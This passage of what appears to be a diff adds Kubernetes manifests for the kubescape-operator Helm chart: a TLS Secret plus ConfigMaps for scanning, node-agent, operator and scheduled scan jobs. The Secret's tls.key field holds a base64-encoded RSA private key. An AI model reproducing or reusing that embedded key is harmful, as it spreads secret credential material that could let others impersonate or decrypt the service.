LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURjekNDQWx1Z0F3SUJBZ0lSQU1Hd29nRElPWXh1c01nTGNHZnlIR2N3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dKekVsTUNNR0ExVUVBeE1jYzNSdmNtRm5aUzVvYjI1bGVTNXpkbU10ClNVUlRSakJMTkhaa09EQ0NBU0l3RFFZSktvWklodmNOQVFFQkJRQURnZ0VQQURDQ0FRb0NnZ0VCQU5wcWptbk8KaSthZ0FjbkZKY0h5bGRxa1pVdXFMNTZDbThja0t1MlpwV3p5LzF3RlJST1pGL09qQTlaWWl5aUVFc0tqbVpFaQpVRmRNY2FRQ0I1Qm5hSWdzQThUc2dRSXlpNEVLa3MzQUhIME03QXpFc3gxc3ZZRTYrRUkyYmNqUUZqelp5Nm1yClp2OEs5VGhWSVVQMDNDSG1kbkFXbERHN3Mva2VINWE3eEVaSUFIYTBrK3ljVk5uVmtyK1EzVTRwUUpSNUZhU04KMzR3NDcyUWdDc21DcSt3QlA4WjRFT3hsYWszT3hneUpYZ0ZiU0lnaXAwZTgrS1pSVWRxZTJTWXppUVRNYldBQgpVNmJoaDFrZTdGUElMV1VTelQxaGl2N1o4UEc5ZjdSQ1VJTW5JTjY4Z2pHODFIdGkzRFlvOHN2OEFOMlRhcTlQClFWNDBpN3lVMHlvT2VTa0NBd0VBQWFPQm9EQ0JuVEFPQmdOVkhROEJBZjhFQkFNQ0JhQXdIUVlEVlIwbEJCWXcKRkFZSUt3WUJCUVVIQXdFR0NDc0dBUVVGQndNQ01Bd0dBMVVkRXdFQi93UUNNQUF3SHdZRFZSMGpCQmd3Rm9BVQpTa0ppbzVsQ3BPYzNGb0YzclR3UkxoMkVhL3N3UFFZRFZSMFJCRFl3TklJUmMzUnZjbUZuWlM1b2IyNWxlUzV6CmRtT0NIM04wYjNKaFoyVXVhRzl1WlhrdWMzWmpMbU5zZFhOMFpYSXViRzlqWVd3d0RRWUpLb1pJaHZjTkFRRUwKQlFBRGdnRUJBRGxpRVJ5ZFF4c2VSSWgyTmgwa2drQldxc2NpbEZpaUxYR1VnV1BkQmtaS1dzNUZ6VS9vSVdpeQo5K2k2aHZxM3ZOOEhCTDdENXg1TldOTU8wa08zUzVDa0NYN2g3ank5UE9IMUowNFRDTmRkQ0I1VzRxWnJyOGhxCjlWa3B5eVFHWTRRRTh1UTBxSzJ4L2M3UGllbXNRbkl0czFpT1llclJVNkJqK1ptSjZxc0J3Ykdab0l0NmQ4ZHEKNWp6MUhQZFZhSDlDVGw4ZkxLSk1ibHJFK2ovU1lsKzUyWWVRNVI1T0IzZ1BZT1JUVHg1dERsSXVVT3JPaXRNbwpyYjNyVDB6WW9TdlRvVmpMM09WYzdrS1QyNm9oNHZ3N2dlS0hVTGYySkpUWEk0MCtUL1RpYWtPRi9odERUWm85CndyMkI0UGw1YWdtbHFoYUQxWHpoQXBnRU9ybktvU2c9Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K + tls.key: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFb0FJQkFBS0NBUUVBMm1xT2FjNkw1cUFCeWNVbHdmS1YycVJsUzZvdm5vS2J4eVFxN1ptbGJQTC9YQVZGCkU1a1g4Nk1EMWxpTEtJUVN3cU9aa1NKUVYweHhwQUlIa0dkb2lDd0R4T3lCQWpLTGdRcVN6Y0FjZlF6c0RNU3oKSFd5OWdUcjRRalp0eU5BV1BObkxxYXRtL3dyMU9GVWhRL1RjSWVaMmNCYVVNYnV6K1I0ZmxydkVSa2dBZHJTVAo3SnhVMmRXU3Y1RGRUaWxBbEhrVnBJM2ZqRGp2WkNBS3lZS3I3QUUveG5nUTdHVnFUYzdHRElsZUFWdElpQ0tuClI3ejRwbEZSMnA3WkpqT0pCTXh0WUFGVHB1R0hXUjdzVThndFpSTE5QV0dLL3RudzhiMS90RUpRZ3ljZzNyeUMKTWJ6VWUyTGNOaWp5eS93QTNaTnFyMDlCWGpTTHZKVFRLZzU1S1FJREFRQUJBb0gvQkVRUWhBQ0V1dnhsREl2TgpNUHlMOExsRlFUVVJ1UWJVQkErd3h2TTVSK2QzRlZVRkJGejVHc2tVU2h0d25GbjRBOVV1S3FlQTZqT1VCS0FGCmhjeC9QaW1kNlRxMVNsV3lZOUxSQ3pPMVdydmw0Rm4zSlp2NkY0d1BUVHZDNlNrblJnajY4VlZuclpPSk5wQnoKRmVDeWEvY1VXUndYeU9EaG92dnpvZjRJMTFhSGJEZWVES0lFdFNXRExmL29jaVBWRWhCcERzdzZzQW5iMDFCdAowK2VlVTczUFordHJGazFKZGVWcnoyVG1MUmJyVnpvNDlJYXJYaGVGRE9yT0s5T24vdkNnbEQ0T2NpRGFtUG14CjhEMzVkY1V6T2tXeWZZY0t0UlBMRDRpU3lKL2NSQnlKQllPQkxydG1BTTZmWEVuSVN3ZEJoLzhrNjlyVkZ0V0cKMlBLUkFvR0JBUGlRcVVIUXNyaHdlODRIbzBTUG5hY3NYT1ByQ3o5Z0ZSTVhCS2IrS210UFljL3dLUlAvZHI4Wgp2S3pPUzlCdFg1eU5ia3ZXUmJZMG5lYUlIN2FFcXV0MENVcUJZYnNSSDg4Wndndi95WmlBUGlyUUdGNXpaT3FyClFVOGRWSkpDNXI0a1VWQ2RBZ2o4QlRobjZIR0RxRW5OTHdjaTNZclAzT1VGWmR6UEg5bWxBb0dCQU9EekNVUjEKZjc0dHRPYzNUNEh2U2lnNk5zVVZRTHFFMUxBUkRseUhEalM5WlRVWFYveVUyNFFxc2NIaFRIQmhYUytNeXJoKwpWMGZrVXNwdlUxRk45OW5Zb3p0KzVYVlpHTVpJR3JHS2FYRHg1Z2p1czJ2bVdjY05MMXk1WnVFMkgyaFZkVjM0Cm45c00yWDRxSUhpelRHWWFGUk95dFllT1pFTXVxUWFwREtJMUFvR0FCZE5lSkN6QUE1S2ZWRFRabnNHKzhDd2EKQVQyQkJmczZnemdHNCtNUkczTEEyQjdJMTY4bEdWV0JGb3UvT3lOVkdsWTJQNURHRVg4cU5EejhnVXFhdHVvQgpUYjI2aktmYUZ3Q0RpOFJ5OVNBTVZQU0xuYXNXc21sUkhvbVJjZHdmakZWTmtwWWJkaHB5Qk9CcWtqNkRzemNiCjR3N3VJbEs4MnFGRndlY1kyQUVDZ1lCTHR5STRhOEE2bUJIYS9aQUNjVE9weEtab3dkV09zbVVRZWowMlFiTXoKWjBob2pWbnRSNEYzeEJNZTZpR2JkZm95cGhZWjhWU1pleTJ1dTdmMGx1VEU2NWxOemxHWHBReWt1T0piUGZadApzTTQ
zMVhpSTZmanYrZTBtTGJXR09ueHAxdEh4ZGwwQUV4d2x6akl0emxQNXplK29PSy9IVjlOQmxiUUk3TisyCnZRS0JnSEhrbDVPcDhkVWdkYTNzS0lLNzduK0JwUUJrcWdsQ1dMTkdkZFhOLyt2MUVpU01XUFNQOGdqa2xPb1gKYkRWUUVCSS9XVERXdUE2Nno2WEVLWHJjWkJRRWtUdjR2TWNFUmozSEloVWNoNDVBNnArZmc1RlhrOVFZQUVpcgoyUGYyUmU1elNhL0JvY0NjN3FFL1BtZjBNVjdzT0FXaWdsemFNeEVRTjUzaXdGd2IKLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K + ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURMRENDQWhTZ0F3SUJBZ0lSQUpiWTBacHczMnRPYkE3bkJOQVErcVl3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dJREVlTUJ3R0ExVUVBeE1WYzNSdmNtRm5aUzAwVXpWSFUzRlpUbUk1CkxXTmhNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTMyNnJ0T3ZnaUJqR3ZYZ0wKZWdXdFlTVUZ3M2tNL2tmL3kraWx6TWdwSUIvSnpIZG1jc2M1VVk0RUxYRTdYQllVb1FiL3ZJWmxnNWFNWmt1ZAovT2VncnN1VHVtRWNWRllienpleUtmL0wzSEM5SXZsQzN1d0FzREVyTENHaCs1TmdYc2dkdi9BYjVGNTg0Q21VCnlUUzl2aklFNTYrbmJWQVdnUTVYY3dRQ0xrTGFocitKck1yL0FoYzdRTVNLdXdnK0tOZlBWTWNSWmk3U2pqTXcKNXcvSllxR2k5N0h3a3NzbnZjcWRmb01NKzlCV0pxRndIdlFiaG1Ub2twbm13VVkzNTFEK3ZwZGZOaE5ObG5JeQoyQS9ocWVNOHg2WmYraW1mb2NnWTVtUWcwQkowQzVCTDgrN3BMN29kR2FxWmdkNXpKeTBLVFJPbktmdS96clJQClo4WjJZUUlEQVFBQm8yRXdYekFPQmdOVkhROEJBZjhFQkFNQ0FxUXdIUVlEVlIwbEJCWXdGQVlJS3dZQkJRVUgKQXdFR0NDc0dBUVVGQndNQ01BOEdBMVVkRXdFQi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZFcENZcU9aUXFUbgpOeGFCZDYwOEVTNGRoR3Y3TUEwR0NTcUdTSWIzRFFFQkN3VUFBNElCQVFBd29lRUQxOTZlWFZuay9IK3FDM0Z5CjJXSXJZNzRvVElhU3prYTd1UUd2RzlwOUcxdW5sZHdrUUFlckVjUWpHVDdwcmd1VlkxRlQ0ZUxuQzRSeVF2VG8KY3JGVUFPdTRCVEhsaXFmNGUveXBFWFhVbDltanVJK3hBSDJrUWdXOElpSXFVc1dSYmc2cEtqdCtaL25uVytWbQp5QkNHZzBBSFE3UmJBME5MTVJHOFArYkt4eDRwUlFDQlZHbndnbmk4VnVWVjNkTXYvMHdIbG8rRFRSd3d3eStNCnFOcE1BM0ROeURxQVhYK3Z6RlpKMk1oSlpGcDcvQTVTb3g2cVVKM1V1elpzcjZIeWs0dTA4cHdYMUltK01WbmYKaUd3R1lXT1BEQVl3Zkc3c04rbmZTUklCMUNxbXhHdnNxaktoeWRUbVkwVjFPaGtpbUZybEc4QmErMHQ3SHN3cgotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: ks-cloud-config + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + kubescape.io/infra: config +data: + clusterData: "{\n \"serviceDiscovery\": false,\n \"vulnScanURL\": \"kubevuln:8080\"\ + ,\n \"kubevulnURL\": \"kubevuln:8080\",\n \"kubescapeURL\": \"kubescape:8080\"\ + ,\n \"clusterName\": \"bobexample\",\n \"storage\": true,\n \"relevantImageVulnerabilitiesEnabled\"\ + : true,\n \"namespace\": \"honey\",\n \"imageVulnerabilitiesScanningEnabled\"\ + : true,\n \"postureScanEnabled\": true,\n \"otelCollector\": false,\n \"nodeAgent\"\ + : \"true\",\n \"maxImageSize\": 5.36870912e+09,\n \"maxSBOMSize\": 2.097152e+07,\n\ + \ \"keepLocal\": true,\n \"scanTimeout\": \"5m\",\n \"scanEmbeddedSBOMs\":\ + \ false,\n \"vexGeneration\": false,\n \"useDefaultMatchers\": false,\n \"\ + storeFilteredSbom\": false,\n \"continuousPostureScan\": false,\n \"relevantImageVulnerabilitiesConfiguration\"\ + : \"enable\"\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: ks-capabilities + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + 
app.kubernetes.io/component: ks-capabilities + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-capabilities + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + capabilities: "{\n \"capabilities\":{\"admissionController\":\"enable\",\"autoUpgrading\"\ + :\"disable\",\"configurationScan\":\"enable\",\"continuousScan\":\"disable\",\"\ + httpDetection\":\"enable\",\"kubescapeOffline\":\"disable\",\"malwareDetection\"\ + :\"disable\",\"manageWorkloads\":\"disable\",\"networkEventsStreaming\":\"disable\"\ + ,\"networkPolicyService\":\"enable\",\"nodeProfileService\":\"enable\",\"nodeSbomGeneration\"\ + :\"enable\",\"nodeScan\":\"enable\",\"operator\":\"enable\",\"prometheusExporter\"\ + :\"enable\",\"relevancy\":\"enable\",\"runtimeDetection\":\"enable\",\"runtimeObservability\"\ + :\"enable\",\"scanEmbeddedSBOMs\":\"disable\",\"seccompProfileBackend\":\"crd\"\ + ,\"seccompProfileService\":\"enable\",\"syncSBOM\":\"disable\",\"testing\":{\"\ + nodeAgentMultiplication\":{\"enabled\":false,\"replicas\":5}},\"vexGeneration\"\ + :\"disable\",\"vulnerabilityScan\":\"enable\"},\n \"components\":{\"autoUpdater\"\ + :{\"enabled\":false},\"clamAV\":{\"enabled\":false},\"cloudSecret\":{\"create\"\ + :true,\"name\":\"cloud-secret\"},\"customCaCertificates\":{\"name\":\"custom-ca-certificates\"\ + },\"hostScanner\":{\"enabled\":true},\"kubescape\":{\"enabled\":true},\"kubescapeScheduler\"\ + :{\"enabled\":true},\"kubevuln\":{\"enabled\":true},\"kubevulnScheduler\":{\"\ + enabled\":true},\"nodeAgent\":{\"enabled\":true},\"operator\":{\"enabled\":true},\"\ + otelCollector\":{\"enabled\":false},\"prometheusExporter\":{\"enabled\":true},\"\ + serviceDiscovery\":{\"enabled\":false},\"storage\":{\"enabled\":true},\"synchronizer\"\ + :{\"enabled\":false}},\n \"configurations\":{\"excludeJsonPaths\":null,\"otelUrl\"\ + :null,\"persistence\":\"enable\",\"priorityClass\":{\"daemonset\":100000100,\"\ + enabled\":true},\"prometheusAnnotations\":\"disable\"} ,\n \"serviceScanConfig\"\ + \ :{\"enabled\":false,\"interval\":\"1h\"}\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: cs-matching-rules + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + matchingRules.json: '{"match":[{"apiGroups":["apps"],"apiVersions":["v1"],"resources":["deployments"]}],"namespaces":["default"]} + + ' +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubescape-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + request-body.json: '{"commands":[{"CommandName":"kubescapeScan","args":{"scanV1":{}}}]}' +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: host-scanner-definition + namespace: honey + annotations: null + labels: + 
helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + host-scanner-yaml: "apiVersion: apps/v1\nkind: DaemonSet\nmetadata:\n name: host-scanner\n\ + \ namespace: honey\n annotations:\n \n argocd.argoproj.io/compare-options:\ + \ \"IgnoreExtraneous\"\n argocd.argoproj.io/sync-options: \"Prune=false\"\n\ + \ labels:\n helm.sh/chart: kubescape-operator-1.30.2\n app.kubernetes.io/name:\ + \ kubescape-operator\n app.kubernetes.io/instance: kubescape\n app.kubernetes.io/component:\ + \ host-scanner\n app.kubernetes.io/version: \"1.30.2\"\n app.kubernetes.io/managed-by:\ + \ Helm\n app.kubernetes.io/part-of: kubescape\n app: host-scanner\n tier:\ + \ ks-control-plane\n kubescape.io/ignore: \"true\"\nspec:\n selector:\n \ + \ matchLabels:\n app.kubernetes.io/name: kubescape-operator\n app.kubernetes.io/instance:\ + \ kubescape\n app.kubernetes.io/component: host-scanner\n template:\n \ + \ metadata:\n annotations:\n \n argocd.argoproj.io/compare-options:\ + \ \"IgnoreExtraneous\"\n argocd.argoproj.io/sync-options: \"Prune=false\"\ + \n labels:\n helm.sh/chart: kubescape-operator-1.30.2\n app.kubernetes.io/name:\ + \ kubescape-operator\n app.kubernetes.io/instance: kubescape\n app.kubernetes.io/component:\ + \ host-scanner\n app.kubernetes.io/version: \"1.30.2\"\n app.kubernetes.io/managed-by:\ + \ Helm\n app.kubernetes.io/part-of: kubescape\n app: host-scanner\n\ + \ tier: ks-control-plane\n kubescape.io/ignore: \"true\"\n \ + \ kubescape.io/tier: \"core\"\n name: host-scanner\n spec:\n \ + \ nodeSelector:\n kubernetes.io/os: linux\n affinity:\n tolerations:\n\ + \ - effect: NoSchedule\n key: node-role.kubernetes.io/control-plane\n\ + \ operator: Exists\n - effect: NoSchedule\n key: node-role.kubernetes.io/master\n\ + \ operator: Exists\n containers:\n - name: host-sensor\n \ + \ image: \"quay.io/kubescape/host-scanner:v1.0.78\"\n imagePullPolicy:\ + \ IfNotPresent\n securityContext:\n allowPrivilegeEscalation:\ + \ true\n privileged: true\n readOnlyRootFilesystem: true\n \ + \ env:\n - name: KS_LOGGER_LEVEL\n value: \"info\"\n \ + \ - name: KS_LOGGER_NAME\n value: \"zap\"\n ports:\n \ + \ - name: scanner # Do not change port name\n containerPort: 7888\n\ + \ protocol: TCP\n resources:\n limits:\n \ + \ cpu: 0.4m\n memory: 400Mi\n requests:\n cpu:\ + \ 0.1m\n memory: 200Mi\n volumeMounts:\n - mountPath:\ + \ /host_fs\n name: host-filesystem\n startupProbe:\n \ + \ httpGet:\n path: /readyz\n port: 7888\n failureThreshold:\ + \ 30\n periodSeconds: 1\n livenessProbe:\n httpGet:\n\ + \ path: /healthz\n port: 7888\n periodSeconds:\ + \ 10\n terminationGracePeriodSeconds: 120\n dnsPolicy: ClusterFirstWithHostNet\n\ + \ serviceAccountName: node-agent\n automountServiceAccountToken: false\n\ + \ volumes:\n - hostPath:\n path: /\n type: Directory\n\ + \ name: host-filesystem\n hostPID: true\n hostIPC: true" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubevuln-scheduler + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + 
app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + request-body.json: '{"commands":[{"commandName":"scan","designators":[{"designatorType":"Attributes","attributes":{}}]}]}' +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"applicationProfileServiceEnabled\": true,\n \"backendStorageEnabled\"\ + : false,\n \"prometheusExporterEnabled\": true,\n \"runtimeDetectionEnabled\"\ + : true,\n \"httpDetectionEnabled\": true,\n \"networkServiceEnabled\": true,\n\ + \ \"malwareDetectionEnabled\": false,\n \"hostMalwareSensorEnabled\": false,\n\ + \ \"hostNetworkSensorEnabled\": false,\n \"nodeProfileServiceEnabled\":\ + \ false,\n \"networkStreamingEnabled\": false,\n \"maxImageSize\": 5.36870912e+09,\n\ + \ \"maxSBOMSize\": 2.097152e+07,\n \"sbomGenerationEnabled\": true,\n \ + \ \"enableEmbeddedSBOMs\": false,\n \"seccompServiceEnabled\": true,\n \ + \ \"seccompProfileBackend\": \"crd\",\n \"initialDelay\": \"2m\",\n \"updateDataPeriod\"\ + : \"10000m\",\n \"nodeProfileInterval\": \"10m\",\n \"networkStreamingInterval\"\ + : \"2m\",\n \"maxSniffingTimePerContainer\": \"2m\",\n \"excludeNamespaces\"\ + : \"kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse\"\ + ,\n \"excludeLabels\":null,\n \"exporters\": {\n \"alertManagerExporterUrls\"\ + :[],\n \"stdoutExporter\":true,\n \"syslogExporterURL\": \"\"\n },\n\ + \ \"excludeJsonPaths\":null,\n \"ruleCooldown\": {\n \"ruleCooldownDuration\"\ + : \"0h\",\n \"ruleCooldownAfterCount\": 1e+09,\n \"ruleCooldownOnProfileFailure\"\ + : false,\n \"ruleCooldownMaxSize\": 20000\n }\n}\n" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"excludeNamespaces\": \"kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse\"\ + ,\n \"namespace\": \"honey\",\n \"triggersecurityframework\": true,\n \"podScanGuardTime\"\ + : \"1h\",\n \"excludeJsonPaths\":null,\n \"httpExporterConfig\":{\"maxAlertsPerMinute\"\ + :1000,\"method\":\"POST\",\"url\":\"http://synchronizer:8089/apis/v1/kubescape.io\"\ + },\n \"nodeAgentAutoscaler\": {\n \"enabled\": false,\n \"nodeGroupLabel\"\ + : \"node.kubernetes.io/instance-type\",\n \"resourcePercentages\": {\n \ + \ \"requestCPU\": 2,\n \"requestMemory\": 2,\n \"limitCPU\": 5,\n \ + \ \"limitMemory\": 5\n },\n \"minResources\": {\n \"cpu\": \"100m\"\ + 
,\n \"memory\": \"600Mi\"\n },\n \"maxResources\": {\n \"cpu\"\ + : \"2000m\",\n \"memory\": \"4Gi\"\n },\n \"reconcileInterval\": \"\ + 5m\",\n \"templatePath\": \"/etc/templates/daemonset-template.yaml\",\n \ + \ \"operatorDeploymentName\": \"operator\"\n }\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubescape-cronjob-template + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: kubescape-scheduler\n\ + \ namespace: honey\n labels:\n app: kubescape-scheduler\n tier: ks-control-plane\n\ + \ kubescape.io/tier: \"core\"\n armo.tier: \"kubescape-scan\"\nspec:\n \ + \ schedule: \"0 8 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit:\ + \ 1\n jobTemplate:\n spec:\n template:\n metadata:\n \ + \ labels:\n armo.tier: \"kubescape-scan\"\n kubescape.io/tier:\ + \ \"core\"\n spec:\n securityContext:\n seccompProfile:\n\ + \ type: RuntimeDefault\n containers:\n - name:\ + \ kubescape-scheduler\n image: \"quay.io/kubescape/http-request:v0.2.16\"\ + \n imagePullPolicy: IfNotPresent\n securityContext:\n \ + \ allowPrivilegeEscalation: false\n readOnlyRootFilesystem:\ + \ true\n runAsNonRoot: true\n runAsUser: 100\n \ + \ resources:\n limits:\n cpu: 10m\n \ + \ memory: 20Mi\n requests:\n cpu: 1m\n \ + \ memory: 10Mi\n args:\n - -method=post\n \ + \ - -scheme=http\n - -host=operator:4002\n \ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubescape\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: kubescape-scheduler" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubevuln-cronjob-template + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: kubevuln-scheduler\n\ + \ namespace: honey\n labels:\n app: kubevuln-scheduler\n tier: ks-control-plane\n\ + \ kubescape.io/tier: \"core\"\n armo.tier: \"vuln-scan\"\nspec:\n schedule:\ + \ \"0 0 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit: 1\n\ + \ jobTemplate:\n spec:\n template:\n metadata:\n labels:\n\ + \ armo.tier: \"vuln-scan\"\n kubescape.io/tier: \"core\"\ + \n spec:\n securityContext:\n seccompProfile:\n \ + \ type: RuntimeDefault\n containers:\n - name: kubevuln-scheduler\n\ + \ image: \"quay.io/kubescape/http-request:v0.2.16\"\n imagePullPolicy:\ + \ 
IfNotPresent\n securityContext:\n allowPrivilegeEscalation:\ + \ false\n readOnlyRootFilesystem: true\n runAsNonRoot:\ + \ true\n runAsUser: 100\n resources:\n limits:\n\ + \ cpu: 10m\n memory: 20Mi\n requests:\n\ + \ cpu: 1m\n memory: 10Mi\n args:\n \ + \ - -method=post\n - -scheme=http\n - -host=operator:4002\n\ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubevuln\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: kubevuln-scheduler" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + name: registry-scan-cronjob-template +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: registry-scheduler\n\ + \ namespace: honey\n labels:\n app: registry-scheduler\n kubescape.io/tier:\ + \ \"core\"\n tier: ks-control-plane\n armo.tier: \"registry-scan\"\nspec:\n\ + \ schedule: \"0 0 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit:\ + \ 1\n jobTemplate:\n spec:\n template:\n metadata:\n \ + \ labels:\n armo.tier: \"registry-scan\"\n kubescape.io/tier:\ + \ \"core\"\n spec:\n securityContext:\n seccompProfile:\n\ + \ type: RuntimeDefault\n containers:\n - name:\ + \ registry-scheduler\n image: \"quay.io/kubescape/http-request:v0.2.16\"\ + \n imagePullPolicy: IfNotPresent\n securityContext:\n \ + \ allowPrivilegeEscalation: false\n readOnlyRootFilesystem:\ + \ true\n runAsNonRoot: true\n runAsUser: 100\n \ + \ resources:\n limits:\n cpu: 10m\n \ + \ memory: 20Mi\n requests:\n cpu: 1m\n \ + \ memory: 10Mi\n args:\n - -method=post\n \ + \ - -scheme=http\n - -host=operator:4002\n \ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: 